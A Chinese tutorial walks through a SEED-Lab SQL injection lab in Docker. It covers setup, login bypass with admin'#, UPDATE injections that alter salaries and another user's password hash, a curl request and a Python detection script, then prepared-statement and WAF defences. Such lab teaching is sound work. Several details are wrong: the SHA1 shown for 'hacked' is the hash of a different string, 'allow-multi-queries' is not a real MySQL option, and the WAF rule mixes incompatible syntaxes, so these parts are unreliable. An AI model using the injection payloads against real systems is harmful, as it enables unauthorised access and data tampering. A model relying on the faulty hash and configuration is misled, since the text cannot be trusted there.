保姆级教程：在Docker里复现SEED-Lab SQL注入靶场，手把手带你绕过登录与篡改数据

零基础通关SEED-Lab SQL注入靶场：从Docker搭建到高级攻击实战

在网络安全领域，SQL注入始终位列OWASP十大Web应用安全风险的前三位。对于初学者而言，理论知识的吸收往往不如亲手搭建一个实验环境来得深刻。本文将带你从零开始，使用Docker-compose完整复现SEED-Lab经典SQL注入靶场，并通过七个实战关卡深入理解从基础注入到数据篡改的全过程。

1. 实验环境搭建与排错指南

1.1 Docker-compose环境准备

首先确保系统已安装Docker和Docker-compose。推荐使用以下版本：

docker --version # Docker版本应≥20.10 docker-compose --version # Docker-compose版本应≥1.29

常见安装问题及解决方案：

1.2 靶场部署与配置调优

下载SEED-Lab官方资源后，关键配置步骤如下：

1. 修改Apache配置：

   # 进入容器内配置文件目录 cd Labsetup/image_www vim apache2.conf

   确保包含以下关键配置：

   <Directory /var/www/> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory>

2. MySQL服务启动检查：

   docker exec -it seed-lab-mysql /bin/bash service mysql status

   若服务未运行，尝试：

   mysqld_safe --skip-grant-tables & mysql_upgrade -u root -pseedubuntu

3. 完整启动流程：

   docker-compose build --no-cache # 彻底重建镜像 docker-compose up -d # 后台运行

提示：遇到AH00558: apache2: Could not reliably determine...警告属于正常现象，不影响服务运行。

2. SQL注入原理深度解析

2.1 认证绕过核心机制

观察靶场登录页面的认证逻辑：

$input_uname = $_GET['username']; $input_pwd = $_GET['Password']; $hashed_pwd = sha1($input_pwd); $sql = "SELECT * FROM credential WHERE name='$input_uname' AND Password='$hashed_pwd'";

当输入admin'#时，SQL语句变为：

SELECT * FROM credential WHERE name='admin'#' AND Password='hashed_value'

#将后续条件注释掉，使得只需用户名匹配即可通过验证。

2.2 多种注入方式对比

3. 实战攻击全流程演示

3.1 基础登录绕过

步骤演示：

1. 访问http://localhost/unsafe_home.php
2. 用户名输入：admin'#
3. 密码任意输入（如123）
4. 成功进入管理员界面

CURL命令验证：

curl "http://localhost/unsafe_home.php?username=admin%27%23&Password=123"

3.2 数据篡改攻击链

3.2.1 修改自身薪资

1. 以Alice身份登录（用户名：Alice'#）
2. 进入Edit Profile页面
3. 在Nickname字段输入：

   Alice', salary='99999' WHERE Name='Alice'#

4. 提交后查询数据库验证：

   SELECT Name, salary FROM credential WHERE Name='Alice';

3.2.2 横向越权修改他人密码

1. 获取目标密码的SHA1值：

   echo -n "hacked" | sha1sum # 输出：7c4a8d09ca3762af61e59520943dc26494f8941b

2. 在任意可注入字段输入：

   test', Password='7c4a8d09ca3762af61e59520943dc26494f8941b' WHERE Name='Boby'#

4. 防御方案与安全加固

4.1 预处理语句改造

原始危险代码：

$sql = "UPDATE credential SET nickname='$input_nickname' WHERE ID=$id"; $conn->query($sql);

安全改造后：

$stmt = $conn->prepare("UPDATE credential SET nickname=? WHERE ID=?"); $stmt->bind_param("si", $input_nickname, $id); $stmt->execute();

关键参数说明：

• "si"：第一个参数为字符串类型，第二个为整型
• ?占位符确保数据与代码分离

4.2 防御效果验证

尝试原有攻击载荷：

1', salary='50000' WHERE Name='Alice'#

此时数据库仅会更新nickname字段为完整字符串1', salary='50000' WHERE Name='Alice'#，而不会执行SQL注入。

5. 靶场进阶技巧与扩展

5.1 多语句执行特殊配置

如需实验堆叠查询攻击，需修改PHP配置：

// 将$conn->query()替换为： $conn->multi_query($sql);

同时修改MySQL配置：

[mysqld] secure-file-priv = "" allow-multi-queries = ON

5.2 自动化漏洞检测脚本

使用Python编写基础检测工具：

import requests import urllib.parse def check_injection(url): payloads = ["'", "';--", "' OR 1=1--"] for p in payloads: res = requests.get(f"{url}?username={urllib.parse.quote(p)}&password=test") if "error in your SQL syntax" in res.text: return f"Vulnerable to {p}" return "No SQLi detected" print(check_injection("http://localhost/unsafe_home.php"))

6. 企业级防护方案建议

6.1 纵深防御体系

• 输入验证层：

  if (!preg_match('/^[a-zA-Z0-9_]+$/', $input)) { die("Invalid input format"); }

• 数据库权限控制：

  CREATE USER 'app_user'@'localhost' IDENTIFIED BY 'secure_pass'; GRANT SELECT, UPDATE ON db.credential TO 'app_user'@'localhost'; REVOKE DROP, ALTER ON *.* FROM 'app_user'@'localhost';

• WAF规则示例：

  location / { ModSecurityEnabled on; SecRule ARGS "@detectSQLi" "id:1001,deny,status:403" }

7. 实验常见问题排错手册

Q1：Apache默认页面而非实验页面

• 检查Labsetup/image_www目录是否挂载正确
• 确认docker-compose.yml配置：

  volumes: - ./image_www:/var/www/SQLInjection

Q2：MySQL服务无法启动

• 检查数据目录权限：

  chown -R 999:999 ./mysql_data

• 查看错误日志：

  docker logs seed-lab-mysql

Q3：注入语句未生效

• 确认输入字段是否被前端过滤：

  document.getElementById("nickname").addEventListener("input", function(e) { this.value = this.value.replace(/[';#]/g, ""); });

• 使用Burp Suite拦截修改原始请求

在实际教学中发现，许多初学者会在WHERE子句的引号处理上出错。一个实用的调试技巧是先在MySQL命令行中直接运行构建的SQL语句，确认语法正确后再应用到Web界面。